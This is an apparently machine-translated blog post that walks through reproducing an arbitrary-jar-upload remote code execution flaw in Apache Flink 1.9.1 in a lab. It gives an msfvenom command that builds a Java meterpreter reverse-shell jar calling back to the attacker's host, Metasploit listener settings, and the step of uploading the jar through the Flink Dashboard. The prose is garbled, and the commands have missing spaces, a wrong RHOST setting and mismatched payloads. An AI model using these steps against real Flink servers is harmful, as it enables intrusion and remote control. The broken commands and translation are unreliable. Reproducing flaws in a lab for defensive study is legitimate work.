Shulou(Shulou.com)05/31 Report--

This article mainly shows you the "Apache Flink arbitrary Jar package uploaded to RCE vulnerability recurrence example analysis", the content is easy to understand, well-organized, hope to help you solve your doubts, the following let the editor lead you to study and learn the "Apache Flink arbitrary Jar package upload to RCE vulnerability recurrence example analysis" this article.

Introduction to 0x00

Apache Flink is the data processing engine of the fire in recent years. It is highly respected by major manufacturers and has been applied to actual business scenarios. Many companies will choose Apache Flink as the object of selection.

What can Apache Flink be used for?

Real-time recommendation system

Real-time report

Real-time data warehouse and ETL

Complex event processing

Real-time Fraud and Real-time Credit Evaluation

Big data safety monitoring

The core of Flink is a streaming data flow execution engine, which provides functions such as data distribution, data communication and fault tolerance for distributed computing of data streams. Based on the flow execution engine, Flink provides a number of API with higher levels of abstraction for users to write distributed tasks.

Introduction of 0x01 vulnerabilities

Attackers can upload arbitrary jar packages directly in the Apache Flink Dashboard page, thus achieving remote code execution.

0x02 scope of influence

To date, Apache Flink version 1.9.1

0x03 environment building

Attack aircraft kali:192.168.10.147

Injured machine Ubuntu:192.168.10.176

Test environment: Flink 1.9.1 java8+

Download the Apache Flink 1.9.1 installation package:

Https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Use decompression after the download is complete

Tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Enter the bin directory to run. / start-cluster.sh startup environment

The environment successfully builds the target site http://192.168.10.176:8081

Recurrence of 0x04 vulnerabilities

Use kali to generate jar backdoor package

Msfvenom-p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020-f jar > shell.jar

The attack plane accesses the target site and uploads shell.jar

Use kali to configure snooping

Use exploit/multi/handler

Set payload java/shell/reverse_tcp

Set RHOST 192.168.10.147

Set LPORT 2020

Run

Click on the shell.jar you just uploaded to trigger the vulnerability

0x05 repair mode

Update the official website patch or update the latest version

The above is all the contents of the article "sample Analysis of RCE vulnerability recurrence caused by uploading Apache Flink arbitrary Jar package". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.